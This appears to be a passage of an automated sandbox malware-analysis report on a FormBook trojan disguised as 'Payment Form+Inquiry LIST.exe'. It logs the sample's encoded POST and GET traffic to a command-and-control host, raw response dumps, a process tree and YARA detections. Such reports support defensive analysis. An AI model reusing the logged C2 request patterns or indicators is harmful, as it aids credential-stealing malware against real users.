                          Data Ascii: dc9ZS{JrB`A`rI}>.|zEZT$^ $ad Ao=13JbA+GU.3===Y0vui(>aPq71hDM6];Kv0ca-Lk/)uMV;+`9Jgd] e34H3l_kz4Tm2kYJnYkhkn0;l:A72z622bP:}t9V^iFQCF1N2\n$}ktv=zGCItnIh4<skLDAgf,_ieN{C*oE_o7=mjrw~zJ1u?)QEi{RKkyMO3/YbFtB1D8bJwm|tSf.3w~1N\8P ("cSPt]^!|y~#NQl \#B(h)Kc[Ce&\JH_&et`!J~J95nrvAw2{q.*^]AaHK1ZjrM/G7c]NR~UtYqZ{'g^*H[`m2/hp8~SyvlQXKTU2w&b_urheXdLZCfRus#l>wv<ulJ<Nq]u2FxGgUB*fc4;L< [TRUNCATED]
                          Jul 18, 2024 08:19:03.581224918 CEST1236INData Raw: ff be ab e7 3b aa ab fb 61 4f f7 13 a3 ce 59 8b f3 eb 2c 40 b8 b4 0c 99 21 dc 16 0f 15 35 6c 80 c8 5f e5 74 c2 e0 07 54 bf 55 85 e9 d2 a9 63 59 f8 2a 33 cd 2f 26 51 e1 8d 91 b1 0d c8 b1 ba e8 85 9c 8c 99 1d 72 d1 3a 8b 63 d8 de e0 b4 0f 90 28 5d
                          Data Ascii: ;aOY,@!5l_tTUcY*3/&Qr:c(]oY~s9G~YiI!85]$$Y!tTy%))M@)s#>[BrMD4PRs"-c{Uiw>qam5|bSJN@5fXprq~?
                          Jul 18, 2024 08:19:03.581233025 CEST1236INData Raw: 91 b8 c2 24 11 8d b4 41 a2 d4 b0 17 b8 32 f6 b9 d4 0d 9e 18 b3 ac 6b 19 34 86 1e 10 d8 a6 70 3c 83 e3 17 28 19 25 b2 91 c0 64 d0 b1 90 5a 86 4f 06 7d d3 bd a6 d6 96 a6 a6 7b ad 92 ba af db 00 bf 98 21 c6 15 0b 72 85 a5 9f cf bc 2a f6 50 34 ad c2
                          Data Ascii: $A2k4p<(%dZO}{!r*P4$F'q)XTVq?s}XO9.Zd%8{TJ+0"U,\c~0bM7XLmgqd+b7X%hGJ>U Uvz-*mZmTTB
                          Jul 18, 2024 08:19:03.581711054 CEST38INData Raw: 8a 66 d4 35 10 45 69 71 57 ef 05 ea fa 1c 96 11 b8 76 2d df c6 fe 2f ef 30 2b bf 08 30 00 00 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: f5EiqWv-/0+00


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.949740154.92.52.19680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:19:05.208739996 CEST817OUTPOST /gtrt/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.csstoneoak.com
                          Origin: http://www.csstoneoak.com
                          Referer: http://www.csstoneoak.com/gtrt/
                          Content-Length: 220
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 50 46 38 55 46 43 44 6f 47 6b 45 71 2b 2f 59 43 68 6a 35 58 79 2f 4c 49 51 4d 7a 74 54 5a 2b 52 72 70 2b 35 47 33 41 65 34 59 72 65 6f 52 6b 49 34 6b 4f 2b 37 6c 70 36 56 77 4d 6d 4a 66 67 78 78 6f 6e 69 70 58 62 49 66 67 37 4e 79 4f 38 4e 65 32 52 41 6d 4b 53 54 49 75 5a 69 48 4d 70 65 69 52 4a 6d 76 2b 42 72 58 47 6f 51 32 78 75 7a 31 43 41 5a 53 39 37 39 54 77 78 41 43 52 52 46 47 51 42 50 70 71 48 48 44 4f 61 6e 36 51 34 4e 2b 4d 61 73 4d 72 57 4f 50 38 56 31 6e 59 54 71 39 71 54 61 4b 2b 53 2f 38 79 79 2f 56 31 4b 43 6d 75 68 32 54 77 59 32 77 65 2f 48 4a 47 7a 57 54 51 69 33 42 52 32 62 6c 42 51 67 6d 5a 4f 33 48 51 3d 3d
                          Data Ascii: mZytyNB=PF8UFCDoGkEq+/YChj5Xy/LIQMztTZ+Rrp+5G3Ae4YreoRkI4kO+7lp6VwMmJfgxxonipXbIfg7NyO8Ne2RAmKSTIuZiHMpeiRJmv+BrXGoQ2xuz1CAZS979TwxACRRFGQBPpqHHDOan6Q4N+MasMrWOP8V1nYTq9qTaK+S/8yy/V1KCmuh2TwY2we/HJGzWTQi3BR2blBQgmZO3HQ==
                          Jul 18, 2024 08:19:06.130501986 CEST1236INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Content-Encoding: gzip
                          Data Raw: 64 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5a eb 53 1b c9 11 ff 1c ff 15 7b 4a a5 ea ae 72 42 12 60 0c 17 41 85 60 72 49 ce b1 7d 3e 2e ae 7c a2 84 b4 c0 da 7a 45 5a 8c b9 54 aa 24 b0 5e 20 24 61 64 de 20 9e 86 b3 41 12 6f 3d 10 fc 31 b7 33 bb fb e9 fe 85 f4 ec 4a 62 41 2b 19 47 c7 55 a5 ca 2e 17 b0 bb 33 3d 3d dd 3d fd f8 f5 18 07 59 9b 95 b2 30 ae 76 8d 95 75 69 28 ab c9 3e d0 ae f9 61 50 d3 71 e7 37 bf 31 da 68 d6 44 d9 4d 36 ba 5d f3 82 a1 87 9d 0e 17 ab a1 cc 0e 3b 4b db d9 76 cd 30 63 61 07 db 2d f4 0b c6 4c 6b a5 87 2f 29 c6 ce b0 8c c9 aa 75 9b 4d 56 ba dd d0 a0 ff 92 b2 c1 3b db 90 ed ca 2b d3 cb ab af 60 39 4a fe 67 64 fa 5d b0 20 65 33 b9 06 18 bb bc 84 be f8 34 48 33 03 83 6c bb 9e 92 5f 6b 0c 7a fd ef 34 54 f1 6d f1 c9 ed 32 b7 6b 06 59 d6 e9 fe 4a a7 1b 1e 1e 6e a0 59 1b 6b 68 6b 6e 30 3b 6c 3a b7 41 37 32 e4 7a 36 32 32 62 d2 50 d2 3a 7d 0e 97 85 86 cd db 1d 1a ca f8 99 16 98 74 39 ac 56 86 08 01 5e 69 b5 1d 1d 46 9d cc 51 99 43 ea 8e 11 46 31 4e 96 32 0f 9a 5c 6e 1a 24 f1 7d cf [TRUNCATED]
                          Data Ascii: dc9ZS{JrB`A`rI}>.|zEZT$^ $ad Ao=13JbA+GU.3===Y0vui(>aPq71hDM6];Kv0ca-Lk/)uMV;+`9Jgd] e34H3l_kz4Tm2kYJnYkhkn0;l:A72z622bP:}t9V^iFQCF1N2\n$}ktv=zGCItnIh4<skLDAgf,_ieN{C*oE_o7=mjrw~zJ1u?)QEi{RKkyMO3/YbFtB1D8bJwm|tSf.3w~1N\8P ("cSPt]^!|y~#NQl \#B(h)Kc[Ce&\JH_&et`!J~J95nrvAw2{q.*^]AaHK1ZjrM/G7c]NR~UtYqZ{'g^*H[`m2/hp8~SyvlQXKTU2w&b_urheXdLZCfRus#l>wv<ulJ<Nq]u2FxGgUB*fc4;L< [TRUNCATED]
                          Jul 18, 2024 08:19:06.130536079 CEST1236INData Raw: ff be ab e7 3b aa ab fb 61 4f f7 13 a3 ce 59 8b f3 eb 2c 40 b8 b4 0c 99 21 dc 16 0f 15 35 6c 80 c8 5f e5 74 c2 e0 07 54 bf 55 85 e9 d2 a9 63 59 f8 2a 33 cd 2f 26 51 e1 8d 91 b1 0d c8 b1 ba e8 85 9c 8c 99 1d 72 d1 3a 8b 63 d8 de e0 b4 0f 90 28 5d
                          Data Ascii: ;aOY,@!5l_tTUcY*3/&Qr:c(]oY~s9G~YiI!85]$$Y!tTy%))M@)s#>[BrMD4PRs"-c{Uiw>qam5|bSJN@5fXprq~?
                          Jul 18, 2024 08:19:06.130547047 CEST1236INData Raw: 91 b8 c2 24 11 8d b4 41 a2 d4 b0 17 b8 32 f6 b9 d4 0d 9e 18 b3 ac 6b 19 34 86 1e 10 d8 a6 70 3c 83 e3 17 28 19 25 b2 91 c0 64 d0 b1 90 5a 86 4f 06 7d d3 bd a6 d6 96 a6 a6 7b ad 92 ba af db 00 bf 98 21 c6 15 0b 72 85 a5 9f cf bc 2a f6 50 34 ad c2
                          Data Ascii: $A2k4p<(%dZO}{!r*P4$F'q)XTVq?s}XO9.Zd%8{TJ+0"U,\c~0bM7XLmgqd+b7X%hGJ>U Uvz-*mZmTTB
                          Jul 18, 2024 08:19:06.130780935 CEST38INData Raw: 8a 66 d4 35 10 45 69 71 57 ef 05 ea fa 1c 96 11 b8 76 2d df c6 fe 2f ef 30 2b bf 08 30 00 00 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: f5EiqWv-/0+00


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.949741154.92.52.19680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:19:07.742604971 CEST1830OUTPOST /gtrt/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Host: www.csstoneoak.com
                          Origin: http://www.csstoneoak.com
                          Referer: http://www.csstoneoak.com/gtrt/
                          Content-Length: 1232
                          Cache-Control: no-cache
                          Connection: close
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Data Raw: 6d 5a 79 74 79 4e 42 3d 50 46 38 55 46 43 44 6f 47 6b 45 71 2b 2f 59 43 68 6a 35 58 79 2f 4c 49 51 4d 7a 74 54 5a 2b 52 72 70 2b 35 47 33 41 65 34 59 54 65 76 69 73 49 35 46 4f 2b 36 6c 70 36 57 77 4e 68 4a 66 67 6f 78 6f 2f 6d 70 58 58 79 66 69 44 4e 79 6f 41 4e 59 48 52 41 2f 61 53 54 41 4f 5a 6a 44 4d 70 4c 69 52 35 69 76 2b 52 72 58 47 6f 51 32 33 43 7a 31 54 41 5a 4a 39 37 2b 62 51 78 4d 55 68 52 35 47 51 5a 78 70 71 4b 79 45 2b 36 6e 37 77 6f 4e 38 2b 69 73 45 72 57 4d 44 63 55 6f 6e 59 65 6f 39 71 50 57 4b 2b 6d 56 38 31 47 2f 57 43 4b 64 37 38 67 6f 41 53 63 43 34 75 50 43 45 7a 7a 73 64 52 2f 4c 55 68 4b 39 32 77 6c 63 74 4e 62 6f 66 4a 35 6f 50 2b 31 53 36 7a 6e 7a 6e 6a 44 70 51 54 43 5a 48 63 6c 49 50 4d 79 77 43 67 73 75 53 41 7a 2f 2f 6b 52 33 35 79 53 4d 37 45 31 44 64 50 48 71 50 2f 47 47 36 54 38 6b 71 56 51 62 54 2f 76 65 37 4b 4c 72 31 6d 4d 4a 37 41 42 49 50 2b 4b 67 73 2f 4d 4b 54 4f 4e 6e 66 6e 6d 52 65 71 49 2b 71 36 35 5a 63 47 72 4e 37 6f 72 34 6d 75 66 52 62 44 74 63 32 4b [TRUNCATED]
                          Data Ascii: mZytyNB=PF8UFCDoGkEq+/YChj5Xy/LIQMztTZ+Rrp+5G3Ae4YTevisI5FO+6lp6WwNhJfgoxo/mpXXyfiDNyoANYHRA/aSTAOZjDMpLiR5iv+RrXGoQ23Cz1TAZJ97+bQxMUhR5GQZxpqKyE+6n7woN8+isErWMDcUonYeo9qPWK+mV81G/WCKd78goAScC4uPCEzzsdR/LUhK92wlctNbofJ5oP+1S6znznjDpQTCZHclIPMywCgsuSAz//kR35ySM7E1DdPHqP/GG6T8kqVQbT/ve7KLr1mMJ7ABIP+Kgs/MKTONnfnmReqI+q65ZcGrN7or4mufRbDtc2KgLNBD4GOjUKEjXNwXRvpejqSLQMqQmH86oJJrzLm1ISESxYwOWF6sBVOJ/H+aFIxVgBLcyhimB2AnnDibYCgog0OYAiNZk1dsKumdhKdvQc/V2NSg6vEI28K3T6BaS1gw+31k/9XAmCXMmAU8fFd8GSvYtGOnYcllzTm/J4EK3zhHX/rXF2ln25fcfVrGnTXZyxGPn8FzDFJi+iplvIgpvZ4y2yXnOdofVzGtDZil1rOv/lOhw4u860TGiF80pL26rlU9cfK1V8VwpT8dejH89SMrHAngQdlk6CxYFmnWyCDNOWy8/0NEkPvDMVdnfapzGOu25uEjRsYkoqPV7R2y3cn86Xz/MBoqUnU5rQQONIvqp0qTmrv6TrqaJvBtV8x5kCM0sxNI1MbY98Jd/+XaXyhr8DNGgufm0tG1DF12KpHvgQKJCVJnNz7mPbR7O6oM/LZfxpr7G3+JW4E8SZ9ZCjqz5LXH2mbBc9OYH3Pj1Gmjoj3C2VkRM9RJrl0vAUv6f+ZsCpDZkCpdYJnLnRRFUvn3GeyXQU6nv/p+NAoNYExdBiFw+/xgFmaU3qL9pq2gyWrwem1ZiGJoJVn2jWbNPTGYlOWdnaFZt4Yg7RMUeIw96jsCEJ2UGjwyLq+qLYVtnlzQX4/3gIMZsTxJWsb/sYMITR2Z/DEKp [TRUNCATED]
                          Jul 18, 2024 08:19:08.617599010 CEST1236INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:08 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Content-Encoding: gzip
                          Data Raw: 64 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5a eb 53 1b c9 11 ff 1c ff 15 7b 4a a5 ea ae 72 42 12 60 0c 17 41 85 60 72 49 ce b1 7d 3e 2e ae 7c a2 84 b4 c0 da 7a 45 5a 8c b9 54 aa 24 b0 5e 20 24 61 64 de 20 9e 86 b3 41 12 6f 3d 10 fc 31 b7 33 bb fb e9 fe 85 f4 ec 4a 62 41 2b 19 47 c7 55 a5 ca 2e 17 b0 bb 33 3d 3d dd 3d fd f8 f5 18 07 59 9b 95 b2 30 ae 76 8d 95 75 69 28 ab c9 3e d0 ae f9 61 50 d3 71 e7 37 bf 31 da 68 d6 44 d9 4d 36 ba 5d f3 82 a1 87 9d 0e 17 ab a1 cc 0e 3b 4b db d9 76 cd 30 63 61 07 db 2d f4 0b c6 4c 6b a5 87 2f 29 c6 ce b0 8c c9 aa 75 9b 4d 56 ba dd d0 a0 ff 92 b2 c1 3b db 90 ed ca 2b d3 cb ab af 60 39 4a fe 67 64 fa 5d b0 20 65 33 b9 06 18 bb bc 84 be f8 34 48 33 03 83 6c bb 9e 92 5f 6b 0c 7a fd ef 34 54 f1 6d f1 c9 ed 32 b7 6b 06 59 d6 e9 fe 4a a7 1b 1e 1e 6e a0 59 1b 6b 68 6b 6e 30 3b 6c 3a b7 41 37 32 e4 7a 36 32 32 62 d2 50 d2 3a 7d 0e 97 85 86 cd db 1d 1a ca f8 99 16 98 74 39 ac 56 86 08 01 5e 69 b5 1d 1d 46 9d cc 51 99 43 ea 8e 11 46 31 4e 96 32 0f 9a 5c 6e 1a 24 f1 7d cf [TRUNCATED]
                          Data Ascii: dc9ZS{JrB`A`rI}>.|zEZT$^ $ad Ao=13JbA+GU.3===Y0vui(>aPq71hDM6];Kv0ca-Lk/)uMV;+`9Jgd] e34H3l_kz4Tm2kYJnYkhkn0;l:A72z622bP:}t9V^iFQCF1N2\n$}ktv=zGCItnIh4<skLDAgf,_ieN{C*oE_o7=mjrw~zJ1u?)QEi{RKkyMO3/YbFtB1D8bJwm|tSf.3w~1N\8P ("cSPt]^!|y~#NQl \#B(h)Kc[Ce&\JH_&et`!J~J95nrvAw2{q.*^]AaHK1ZjrM/G7c]NR~UtYqZ{'g^*H[`m2/hp8~SyvlQXKTU2w&b_urheXdLZCfRus#l>wv<ulJ<Nq]u2FxGgUB*fc4;L< [TRUNCATED]
                          Jul 18, 2024 08:19:08.617615938 CEST1236INData Raw: ff be ab e7 3b aa ab fb 61 4f f7 13 a3 ce 59 8b f3 eb 2c 40 b8 b4 0c 99 21 dc 16 0f 15 35 6c 80 c8 5f e5 74 c2 e0 07 54 bf 55 85 e9 d2 a9 63 59 f8 2a 33 cd 2f 26 51 e1 8d 91 b1 0d c8 b1 ba e8 85 9c 8c 99 1d 72 d1 3a 8b 63 d8 de e0 b4 0f 90 28 5d
                          Data Ascii: ;aOY,@!5l_tTUcY*3/&Qr:c(]oY~s9G~YiI!85]$$Y!tTy%))M@)s#>[BrMD4PRs"-c{Uiw>qam5|bSJN@5fXprq~?
                          Jul 18, 2024 08:19:08.617628098 CEST1236INData Raw: 91 b8 c2 24 11 8d b4 41 a2 d4 b0 17 b8 32 f6 b9 d4 0d 9e 18 b3 ac 6b 19 34 86 1e 10 d8 a6 70 3c 83 e3 17 28 19 25 b2 91 c0 64 d0 b1 90 5a 86 4f 06 7d d3 bd a6 d6 96 a6 a6 7b ad 92 ba af db 00 bf 98 21 c6 15 0b 72 85 a5 9f cf bc 2a f6 50 34 ad c2
                          Data Ascii: $A2k4p<(%dZO}{!r*P4$F'q)XTVq?s}XO9.Zd%8{TJ+0"U,\c~0bM7XLmgqd+b7X%hGJ>U Uvz-*mZmTTB
                          Jul 18, 2024 08:19:08.617760897 CEST38INData Raw: 8a 66 d4 35 10 45 69 71 57 ef 05 ea fa 1c 96 11 b8 76 2d df c6 fe 2f ef 30 2b bf 08 30 00 00 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: f5EiqWv-/0+00


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.949742154.92.52.19680692C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 08:19:10.273647070 CEST528OUTGET /gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US,en;q=0.9
                          Host: www.csstoneoak.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                          Jul 18, 2024 08:19:11.204243898 CEST1236INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 06:19:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Data Raw: 33 30 36 36 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 74 6d 74 31 39 34 2e 63 6f 6d 2f 73 31 2f 79 75 72 6a 79 79 79 61 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 6e 6f 22 20 3c 21 2d 2d 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 2d 2d 3e 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 20 20 20 20 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 [TRUNCATED]
                          Data Ascii: 3066<html dir="ltr" lang="zh"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0"> <iframe marginwidth=0 marginheight=0 width="100%" height="100%" src="https://www.etmt194.com/s1/yurjyyya" frameborder="no" ...scrolling="no"-->></iframe> <script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3J3Wx9NA0GlDdn6N",ck:"3J3Wx9NA0GlDdn6N"})</script><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQVKHmW8C3sAGQG0",ck:"KQVKHmW8C3sAGQG0"})</script></html><!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>-()APP</title> <meta name="description" content="()APP [TRUNCATED]
                          Jul 18, 2024 08:19:11.204299927 CEST1236INData Raw: 9a 84 e6 b0 91 e4 bc 97 e4 ba a7 e7 94 9f e3 80 81 e9 95 bf e8 82 b2 e5 87 ba e6 9d a5 e7 9a 84 ef bc 8c e6 89 80 e4 bb a5 e6 b2 a1 e6 9c 89 e8 bf 99 e7 a7 8d e6 b0 91 e4 bc 97 ef bc 8c e5 b0 b1 e6 b2 a1 e6 9c 89 e5 a4 a9 e6 89 8d e3 80 82 22 3e
                          Data Ascii: "> <link type="text/css" rel="stylesheet" href="static/css/swiper.min.css"> <link rel="stylesheet" type="text/css" href="static/css/oldstyle.css"><div class=
                          Jul 18, 2024 08:19:11.204312086 CEST1236INData Raw: 72 6f 4c 20 66 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 74 6c 22 3e e4 ba a7 e5 93 81 e7 9b ae e5 bd 95 3c 69 6d 67 20 73 72 63 3d 22 73 74 61 74 69 63 2f 70 69 63 74 75 72 65 2f 64 6f 77 6e 2e 70 6e
                          Data Ascii: roL fl"> <div class="ttl"><img src="static/picture/down.png"></div> <ul class="yjk" id="div2"> <li class="yj"><a href="#" class="yja"></a> <ul>
                          Jul 18, 2024 08:19:11.204619884 CEST1236INData Raw: 20 3c 6c 69 3e e7 87 83 e6 b0 94 e7 83 ad e6 b0 b4 e5 99 a8 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e e8 b4 b4 e5 a2 99 e4 bb aa 0a 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <li></li> <li></li> </ul> </li> </ul> </div> <div class="proR fr"> <div class="cp"> <ul class="clear
                          Jul 18, 2024 08:19:11.204632998 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 70 72 6f 69 6d 67 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          Data Ascii: <a href="#" class="proimg"><img src="/uploads/images/89541133.jpg"></a> </div> <p><a href="#"></a></p>
                          Jul 18, 2024 08:19:11.204643965 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 69 6d 67 5f 62 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22
                          Data Ascii: <div class="proimg_bk"> <a href="#" class="proimg"><img src="/uploads/images/16841137.png"></a> </div>
                          Jul 18, 2024 08:19:11.204651117 CEST1236INData Raw: bf 8e e6 9d a5 e7 94 b5 e6 b4 bd e8 b0 88 e3 80 82 e5 a4 a7 e9 98 b3 e5 9f 8e e6 b8 b8 e6 88 8f e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 e8 87 b4 e5 8a 9b e4 ba 8e e5 af b9 e4 ba a7 e5 93 81 e7 9a 84 e5 88 9b e6 96 b0 e3 80 82 e6 88 91 e4 bb ac e4 b8
                          Data Ascii: CE 78
                          Jul 18, 2024 08:19:11.205100060 CEST1236INData Raw: 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 73 70 61 6e 3e e6 96 b0 e9 97 bb e4 b8 ad e5 bf 83 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                          Data Ascii: <div class="bt"> <div><span></span></div> <p>NEWS CENTER</p> </div> <div class="gs fl"> <div class="tlt"><a href="#" title="">MORE+</a><span>DOWNLOAD</s
                          Jul 18, 2024 08:19:11.205136061 CEST1236INData Raw: a6 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 73 70 61 6e 3e 32 30 32 34 2d 30 37 2d 31 38 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e e5 a1 91 e6 96 99 e9 97 a8 e7 aa 97 e8 a7 92
                          Data Ascii: </a></li> <li><span>2024-07-18</span><a href="#"></a></li> <li><span>2024-06-03</span><a href="#"></a></li> <li><span>2024-05-19</span><a hr
                          Jul 18, 2024 08:19:11.205142021 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 73 70 61 6e 3e 32 30 32 34 2d 30 37 2d 31 38 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e e4 b8 8d e9 94 88 e9 92 a2 e6 bb a4 e7 89 87 e5 b1 9e e4 ba 8e e4 bb 80 e4 b9 88
                          Data Ascii: <li><span>2024-07-18</span><a href="#"></a></li> <li><span>2024-07-18</span><a href="#"></a></li> <li><span>2024-07-18</span><a href="#">
                          Jul 18, 2024 08:19:11.205435991 CEST224INData Raw: 22 74 61 63 74 20 66 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e6 8f 90 e4 be 9b e4 bc 98 e7 a7 80 e7 9a 84 e5 a4 a7 e9 98 b3 e5 9f 8e e6 b8 b8 e6 88 8f e5 ae 98 e6 96 b9 e7 bd 91 e7 ab 99 0a e7 9a 84 e7 b3 bb e7 bb 9f
                          Data Ascii: "tact fl"> <p>@2024 </p> </div> </div> </div></div></body></html>0


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:02:15:10
                          Start date:18/07/2024
                          Path:C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe"
                          Imagebase:0x7ff6e8250000
                          File size:1'950'720 bytes
                          MD5 hash:7F8D840982AD0A6C999A3A35E2BFF6C1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:02:15:10
                          Start date:18/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:02:15:11
                          Start date:18/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          Imagebase:0xcf0000
                          File size:2'625'616 bytes
                          MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
